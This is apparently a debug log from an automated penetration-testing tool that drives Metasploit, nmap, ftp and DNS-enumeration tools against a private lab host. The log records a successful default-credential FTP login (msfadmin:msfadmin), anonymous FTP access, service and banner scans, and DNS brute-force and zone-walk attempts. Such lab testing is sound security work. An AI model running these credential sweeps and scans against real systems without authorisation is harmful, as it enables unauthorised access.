2016-10-13 19:59:58,519 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Inside command_meta
2016-10-13 20:00:20,382 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :[4mmsf[0m [0m> 
2016-10-13 20:00:20,382 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :0
2016-10-13 20:00:23,490 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :workspace -a Metasploit_automation
[0m[1m[34m[*][0m Added workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:00:26,601 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :set THREADS 1
[0mTHREADS => 1
[4mmsf[0m [0m> 
2016-10-13 20:00:29,709 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :workspace Metasploit_automation
[0m[1m[34m[*][0m Workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:00:32,819 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :use auxiliary/scanner/ftp/ftp_login
[0m[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:35,929 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :set RHOSTS 192.168.179.136
[0mRHOSTS => 192.168.179.136
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:39,036 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :set USERNAME msfadmin
[0mUSERNAME => msfadmin
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:42,147 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :set PASSWORD msfadmin
[0mPASSWORD => msfadmin
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:45,257 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :set VERBOSE false
[0mVERBOSE => false
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:45,258 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :

Everything Fine till now-->Launching run command


2016-10-13 20:00:50,370 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :

Module Execution completed


2016-10-13 20:00:50,371 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Before : 
After : 
run
[0m
[1m[34m[*][0m 192.168.179.136:21 - Starting FTP login sweep
[1m[32m[+][0m 192.168.179.136:21 - LOGIN SUCCESSFUL: msfadmin:msfadmin
[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:50,371 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :

Now exiting !!!


2016-10-13 20:00:50,371 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :
Exiting  from msfconsole !!!

2016-10-13 20:00:52,480 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Exited from msfconsole !!!
2016-10-13 20:00:52,480 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Before : 
exit
[0mAfter : 
<class 'pexpect.EOF'>
2016-10-13 20:00:52,481 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Closing the child pipe !!!
2016-10-13 20:00:52,582 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_1  Message --> :Saving details :
2016-10-13 20:00:52,584 - Commands Logger - DEBUG - Command id is ->ftp_1
2016-10-13 20:00:52,584 - Commands Logger - DEBUG - commands are : ['>msfconsole', '\x1b[4mmsf\x1b[0m \x1b[0m> ', u'workspace -a Metasploit_automation\n', 'workspace -a Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Added workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'set THREADS 1\n', 'set THREADS 1\r\r\n\x1b[0mTHREADS => 1\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'workspace Metasploit_automation\n', 'workspace Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'use auxiliary/scanner/ftp/ftp_login\n', 'use auxiliary/scanner/ftp/ftp_login\r\r\n\x1b[0m\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n', u'set RHOSTS 192.168.179.136\n', 'set RHOSTS 192.168.179.136\r\r\n\x1b[0mRHOSTS => 192.168.179.136\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n', u'set USERNAME msfadmin\n', 'set USERNAME msfadmin\r\r\n\x1b[0mUSERNAME => msfadmin\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n', u'set PASSWORD msfadmin\n', 'set PASSWORD msfadmin\r\r\n\x1b[0mPASSWORD => msfadmin\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n', u'set VERBOSE false\n', 'set VERBOSE false\r\r\n\x1b[0mVERBOSE => false\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n', '>run', 'run\r\r\n\x1b[0m\r\n\x1b[1m\x1b[34m[*]\x1b[0m 192.168.179.136:21 - Starting FTP login sweep\r\n\x1b[1m\x1b[32m[+]\x1b[0m 192.168.179.136:21 - LOGIN SUCCESSFUL: msfadmin:msfadmin\r\n\x1b[1m\x1b[34m[*]\x1b[0m Scanned 1 of 1 hosts (100% complete)\r\n\x1b[1m\x1b[34m[*]\x1b[0m Auxiliary module execution completed\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31mftp_login\x1b[0m) \x1b[0m> \n']
2016-10-13 20:00:52,585 - Commands Logger - DEBUG - My var : '$.Entries."ftp_1"'
2016-10-13 20:00:52,585 - Commands Logger - DEBUG - Result --> : 
Command Executed :>msfconsole
Result :
run
[0m
[1m[34m[*][0m 192.168.179.136:21 - Starting FTP login sweep
[1m[32m[+][0m 192.168.179.136:21 - LOGIN SUCCESSFUL: msfadmin:msfadmin
[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[4mmsf[0m auxiliary([1m[31mftp_login[0m) [0m> 
2016-10-13 20:00:52,620 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:00:52,621 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Inside command_meta
2016-10-13 20:01:01,581 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :[4mmsf[0m [0m> 
2016-10-13 20:01:01,582 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :0
2016-10-13 20:01:04,688 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :workspace -a Metasploit_automation
[0m[1m[34m[*][0m Added workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:01:07,796 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :set THREADS 1
[0mTHREADS => 1
[4mmsf[0m [0m> 
2016-10-13 20:01:10,902 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :workspace Metasploit_automation
[0m[1m[34m[*][0m Workspace: Metasploit_automation
[4mmsf[0m [0m> 
2016-10-13 20:01:14,011 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :use auxiliary/scanner/ftp/anonymous
[0m[4mmsf[0m auxiliary([1m[31manonymous[0m) [0m> 
2016-10-13 20:01:17,120 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :set RHOSTS 192.168.179.136
[0mRHOSTS => 192.168.179.136
[4mmsf[0m auxiliary([1m[31manonymous[0m) [0m> 
2016-10-13 20:01:20,232 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :set VERBOSE false
[0mVERBOSE => false
[4mmsf[0m auxiliary([1m[31manonymous[0m) [0m> 
2016-10-13 20:01:20,232 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :

Everything Fine till now-->Launching run command


2016-10-13 20:01:25,347 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :

Module Execution completed


2016-10-13 20:01:25,347 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Before : 
After : 
run
[0m
[1m[32m[+][0m 192.168.179.136:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[4mmsf[0m auxiliary([1m[31manonymous[0m) [0m> 
2016-10-13 20:01:25,348 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :

Now exiting !!!


2016-10-13 20:01:25,348 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :
Exiting  from msfconsole !!!

2016-10-13 20:01:27,459 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Exited from msfconsole !!!
2016-10-13 20:01:27,459 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Before : 
exit
[0mAfter : 
<class 'pexpect.EOF'>
2016-10-13 20:01:27,459 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Closing the child pipe !!!
2016-10-13 20:01:27,561 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_2  Message --> :Saving details :
2016-10-13 20:01:27,562 - Commands Logger - DEBUG - Command id is ->ftp_2
2016-10-13 20:01:27,562 - Commands Logger - DEBUG - commands are : ['>msfconsole', '\x1b[4mmsf\x1b[0m \x1b[0m> ', u'workspace -a Metasploit_automation\n', 'workspace -a Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Added workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'set THREADS 1\n', 'set THREADS 1\r\r\n\x1b[0mTHREADS => 1\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'workspace Metasploit_automation\n', 'workspace Metasploit_automation\r\r\n\x1b[0m\x1b[1m\x1b[34m[*]\x1b[0m Workspace: Metasploit_automation\r\n\x1b[4mmsf\x1b[0m \x1b[0m> \n', u'use auxiliary/scanner/ftp/anonymous\n', 'use auxiliary/scanner/ftp/anonymous\r\r\n\x1b[0m\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31manonymous\x1b[0m) \x1b[0m> \n', u'set RHOSTS 192.168.179.136\n', 'set RHOSTS 192.168.179.136\r\r\n\x1b[0mRHOSTS => 192.168.179.136\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31manonymous\x1b[0m) \x1b[0m> \n', u'set VERBOSE false\n', 'set VERBOSE false\r\r\n\x1b[0mVERBOSE => false\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31manonymous\x1b[0m) \x1b[0m> \n', '>run', 'run\r\r\n\x1b[0m\r\n\x1b[1m\x1b[32m[+]\x1b[0m 192.168.179.136:21 - Anonymous READ (220 (vsFTPd 2.3.4))\r\n\x1b[1m\x1b[34m[*]\x1b[0m Scanned 1 of 1 hosts (100% complete)\r\n\x1b[1m\x1b[34m[*]\x1b[0m Auxiliary module execution completed\r\n\x1b[4mmsf\x1b[0m auxiliary(\x1b[1m\x1b[31manonymous\x1b[0m) \x1b[0m> \n']
2016-10-13 20:01:27,562 - Commands Logger - DEBUG - My var : '$.Entries."ftp_2"'
2016-10-13 20:01:27,563 - Commands Logger - DEBUG - Result --> : 
Command Executed :>msfconsole
Result :
run
[0m
[1m[32m[+][0m 192.168.179.136:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
[1m[34m[*][0m Auxiliary module execution completed
[4mmsf[0m auxiliary([1m[31manonymous[0m) [0m> 
2016-10-13 20:01:27,566 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:27,568 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :

Starting FTP Login --Anonmous


2016-10-13 20:01:27,854 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Connected to 192.168.179.136.
220 (vsFTPd 2.3.4)
  Name (192.168.179.136:root):
2016-10-13 20:01:30,963 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Before : After :  anonymous
331 Please specify the password.
Password:
2016-10-13 20:01:34,073 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Login Successful
2016-10-13 20:01:34,074 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Before : After : 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
2016-10-13 20:01:34,074 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Closing Child now !!
2016-10-13 20:01:34,176 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_3  Message --> :Saving details :
2016-10-13 20:01:34,177 - Commands Logger - DEBUG - Command id is ->ftp_3
2016-10-13 20:01:34,178 - Commands Logger - DEBUG - commands are : [u'ftp 192.168.179.136\n', 'Name (192.168.179.136:root):\n', 'Name (192.168.179.136:root):', 'anonymous\n', ' anonymous\r\n331 Please specify the password.\r\nPassword:\n', 'noah@example.com\n', '\r\n230 Login successful.\r\nRemote system type is UNIX.\r\nUsing binary mode to transfer files.\r\nftp> \n']
2016-10-13 20:01:34,178 - Commands Logger - DEBUG - My var : '$.Entries."ftp_3"'
2016-10-13 20:01:34,178 - Commands Logger - DEBUG - Result --> : 
Login SuccesFul --> 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> Command Executed :ftp 192.168.179.136

Result :

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
2016-10-13 20:01:34,191 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:34,192 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_4  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:01:34,192 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_4  Message --> :Thread started --with command nmap -sV --script=ftp-bounce.nse -p 21 192.168.179.136
2016-10-13 20:01:36,247 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_4  Message --> :Thread finished
2016-10-13 20:01:36,248 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_4  Message --> :Saving details :
2016-10-13 20:01:36,251 - Commands Logger - DEBUG - Command id is ->ftp_4
2016-10-13 20:01:36,251 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=ftp-bounce.nse -p 21 192.168.179.136', '\nEnd']
2016-10-13 20:01:36,252 - Commands Logger - DEBUG - My var : '$.Entries."ftp_4"'
2016-10-13 20:01:36,252 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=ftp-bounce.nse -p 21 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:01 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00052s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
MAC Address: 00:0C:29:25:59:EA (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds



2016-10-13 20:01:36,259 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:36,281 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_5  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:01:36,288 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_5  Message --> :Thread started --with command nmap -sV --script=banner.nse -p 21 192.168.179.136
2016-10-13 20:01:38,526 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_5  Message --> :Thread finished
2016-10-13 20:01:38,526 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_5  Message --> :Saving details :
2016-10-13 20:01:38,527 - Commands Logger - DEBUG - Command id is ->ftp_5
2016-10-13 20:01:38,528 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=banner.nse -p 21 192.168.179.136', '\nEnd']
2016-10-13 20:01:38,528 - Commands Logger - DEBUG - My var : '$.Entries."ftp_5"'
2016-10-13 20:01:38,528 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=banner.nse -p 21 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:01 EDT
Nmap scan report for 192.168.179.136
Host is up (0.0013s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_banner: 220 (vsFTPd 2.3.4)
MAC Address: 00:0C:29:25:59:EA (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds



2016-10-13 20:01:38,532 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:38,543 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_6  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:01:38,551 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_6  Message --> :Thread started --with command nmap --script=ftp-anon.nse -p 21 192.168.179.136
2016-10-13 20:01:39,737 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_6  Message --> :Thread finished
2016-10-13 20:01:39,738 - Commands Logger - DEBUG - Command Logger --->Command id --> ftp_6  Message --> :Saving details :
2016-10-13 20:01:39,739 - Commands Logger - DEBUG - Command id is ->ftp_6
2016-10-13 20:01:39,739 - Commands Logger - DEBUG - commands are : [u'nmap --script=ftp-anon.nse -p 21 192.168.179.136', '\nEnd']
2016-10-13 20:01:39,740 - Commands Logger - DEBUG - My var : '$.Entries."ftp_6"'
2016-10-13 20:01:39,740 - Commands Logger - DEBUG - Result --> : Command Executed :nmap --script=ftp-anon.nse -p 21 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:01 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00038s latency).
PORT   STATE SERVICE
21/tcp open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds



2016-10-13 20:01:39,744 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:39,766 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Launching Domain Interactive ::<--- Command :--->nslookup
2016-10-13 20:01:42,099 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :$server 192.168.179.136

2016-10-13 20:01:42,100 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Before : 
After : 
>
2016-10-13 20:01:44,205 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Before : 
 server 192.168.179.136
Default server: 192.168.179.136
After : 
Address: 192.168.179.136#53
> 
2016-10-13 20:01:46,315 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Dns lookup finished with changed dns server 
2016-10-13 20:01:46,317 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Before : cricinfo.com
Server:		192.168.179.136
Address:	192.168.179.136#53

Non-authoritative answer:
Name:	cricinfo.com
After : Address: 52.19.167.6
> 
2016-10-13 20:01:46,318 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Closing Child now !!
2016-10-13 20:01:46,423 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Saving details :
2016-10-13 20:01:46,424 - Commands Logger - DEBUG - Command id is ->domain_1
2016-10-13 20:01:46,424 - Commands Logger - DEBUG - commands are : [u'nslookup\n', u'server 192.168.179.136', 'Address: 192.168.179.136#53\r\n> \n', ' server 192.168.179.136\r\nDefault server: 192.168.179.136\r\n   Address: 192.168.179.136#53\r\n> ', u'cricinfo.com\n', 'Address: 52.19.167.6\r\n> \n']
2016-10-13 20:01:46,424 - Commands Logger - DEBUG - My var : '$.Entries."domain_1"'
2016-10-13 20:01:46,424 - Commands Logger - DEBUG - Result --> : Address: 52.19.167.6
> 


Command Executed :nslookup

Result:
Address: 52.19.167.6
> 

2016-10-13 20:01:46,438 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:01:46,438 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Closing Child now !!
2016-10-13 20:01:46,438 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_1  Message --> :Exiting Domain interactive !!
2016-10-13 20:01:46,438 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Launching FierceCheck with the given host --> 192.168.179.136
2016-10-13 20:01:46,439 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Thread started --with command fierce -dns 192.168.179.136 -threads 10
2016-10-13 20:03:26,441 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Terminating process
2016-10-13 20:03:26,503 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Thread finished
2016-10-13 20:03:26,504 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Parent Process already KIlled
2016-10-13 20:04:16,551 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :
Trying zone transfer first...

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...

Killed


2016-10-13 20:04:16,551 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Dns reverse lookup
2016-10-13 20:04:31,570 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :4
2016-10-13 20:04:31,571 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Reverse dns Failed
2016-10-13 20:04:31,573 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Before : 
After : 
<class 'pexpect.TIMEOUT'>
2016-10-13 20:04:31,573 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Closing Child now !!
2016-10-13 20:04:31,678 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :There is no reverse dns resolution for ip :192.168.179.136
2016-10-13 20:04:31,678 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_2  Message --> :Saving details :
2016-10-13 20:04:31,689 - Commands Logger - DEBUG - Command id is ->domain_2
2016-10-13 20:04:31,689 - Commands Logger - DEBUG - commands are : ['fierce -dns 192.168.179.136 -threads 10\n', '\nTrying zone transfer first...\n\nUnsuccessful in zone transfer (it was worth a shot)\nOkay, trying the good old fashioned way... brute force\n\nChecking for wildcard DNS...\nNope. Good.\nNow performing 2280 test(s)...\n\nKilled\n\n\n', 'Result --> -1', u'No reverse dns for ip -->192.168.179.136']
2016-10-13 20:04:31,691 - Commands Logger - DEBUG - My var : '$.Entries."domain_2"'
2016-10-13 20:04:31,695 - Commands Logger - DEBUG - Result --> : Command Executed :fierce -dns 192.168.179.136 -threads 10


Result:
No reverse dns for ip -->192.168.179.136
2016-10-13 20:04:31,701 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:04:31,704 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :In Dns_recon check
2016-10-13 20:04:31,713 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Dns reverse lookup
2016-10-13 20:04:46,736 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :4
2016-10-13 20:04:46,736 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Reverse dns Failed
2016-10-13 20:04:46,736 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Before : 
After : 
<class 'pexpect.TIMEOUT'>
2016-10-13 20:04:46,736 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Closing Child now !!
2016-10-13 20:04:46,839 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Comamnd to be launched -->dnsrecon -d <reversehost> -D name_list.txt
2016-10-13 20:04:46,839 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Comamnd to be launched -->dnsrecon -d <reversehost> -a
2016-10-13 20:04:46,839 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Launching Command --> :dnsrecon -d 192.168.179.136 -t zonewalk
2016-10-13 20:04:50,708 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :[*] Performing NSEC Zone Walk for 192.168.179.136
[*] Getting SOA record for 192.168.179.136
[-] Error while resolving SOA record.
Traceback (most recent call last):
  File "./dnsrecon.py", line 1681, in <module>
    main()
  File "./dnsrecon.py", line 1595, in main
    ds_zone_walk(res, domain)
  File "./dnsrecon.py", line 1225, in ds_zone_walk
    soa_rcd = res.get_soa()[0][2]
IndexError: list index out of range


2016-10-13 20:04:50,710 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_3  Message --> :Saving details :
2016-10-13 20:04:50,712 - Commands Logger - DEBUG - Command id is ->domain_3
2016-10-13 20:04:50,713 - Commands Logger - DEBUG - commands are : ['Dns check : 192.168.179.136', 'Res:-1', u'dnsrecon -d 192.168.179.136 -t zonewalk\n', '[*] Performing NSEC Zone Walk for 192.168.179.136\n[*] Getting SOA record for 192.168.179.136\n[-] Error while resolving SOA record.\nTraceback (most recent call last):\n  File "./dnsrecon.py", line 1681, in <module>\n    main()\n  File "./dnsrecon.py", line 1595, in main\n    ds_zone_walk(res, domain)\n  File "./dnsrecon.py", line 1225, in ds_zone_walk\n    soa_rcd = res.get_soa()[0][2]\nIndexError: list index out of range\n']
2016-10-13 20:04:50,713 - Commands Logger - DEBUG - My var : '$.Entries."domain_3"'
2016-10-13 20:04:50,713 - Commands Logger - DEBUG - Result --> : Command Executed :Dns check : 192.168.179.136

Result :
[*] Performing NSEC Zone Walk for 192.168.179.136
[*] Getting SOA record for 192.168.179.136
[-] Error while resolving SOA record.
Traceback (most recent call last):
  File "./dnsrecon.py", line 1681, in <module>
    main()
  File "./dnsrecon.py", line 1595, in main
    ds_zone_walk(res, domain)
  File "./dnsrecon.py", line 1225, in ds_zone_walk
    soa_rcd = res.get_soa()[0][2]
IndexError: list index out of range

2016-10-13 20:04:50,729 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:04:50,730 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_4  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:04:50,731 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_4  Message --> :Thread started --with command nmap -sU --script=dns-recursion.nse -p 53 192.168.179.136
2016-10-13 20:05:07,187 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_4  Message --> :Thread finished
2016-10-13 20:05:07,187 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_4  Message --> :Saving details :
2016-10-13 20:05:07,188 - Commands Logger - DEBUG - Command id is ->domain_4
2016-10-13 20:05:07,189 - Commands Logger - DEBUG - commands are : [u'nmap -sU --script=dns-recursion.nse -p 53 192.168.179.136', '\nEnd']
2016-10-13 20:05:07,189 - Commands Logger - DEBUG - My var : '$.Entries."domain_4"'
2016-10-13 20:05:07,189 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sU --script=dns-recursion.nse -p 53 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:04 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00031s latency).
PORT   STATE SERVICE
53/udp open  domain
MAC Address: 00:0C:29:25:59:EA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds



2016-10-13 20:05:07,192 - Commands Logger - DEBUG - Finished!!!
2016-10-13 20:05:07,236 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_5  Message --> :In method SingleLineCommands_Timeout()
2016-10-13 20:05:07,237 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_5  Message --> :Thread started --with command nmap -sV --script=banner.nse -p 53 192.168.179.136
2016-10-13 20:05:30,422 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_5  Message --> :Thread finished
2016-10-13 20:05:30,422 - Commands Logger - DEBUG - Command Logger --->Command id --> domain_5  Message --> :Saving details :
2016-10-13 20:05:30,503 - Commands Logger - DEBUG - Command id is ->domain_5
2016-10-13 20:05:30,503 - Commands Logger - DEBUG - commands are : [u'nmap -sV --script=banner.nse -p 53 192.168.179.136', '\nEnd']
2016-10-13 20:05:30,504 - Commands Logger - DEBUG - My var : '$.Entries."domain_5"'
2016-10-13 20:05:30,504 - Commands Logger - DEBUG - Result --> : Command Executed :nmap -sV --script=banner.nse -p 53 192.168.179.136

Result
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-10-13 20:05 EDT
Nmap scan report for 192.168.179.136
Host is up (0.00026s latency).
PORT   STATE SERVICE VERSION
53/tcp open  domain  ISC BIND 9.4.2
MAC Address: 00:0C:29:25:59:EA (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds



2016-10-13 20:05:30,510 - Commands Logger - DEBUG - Finished!!!
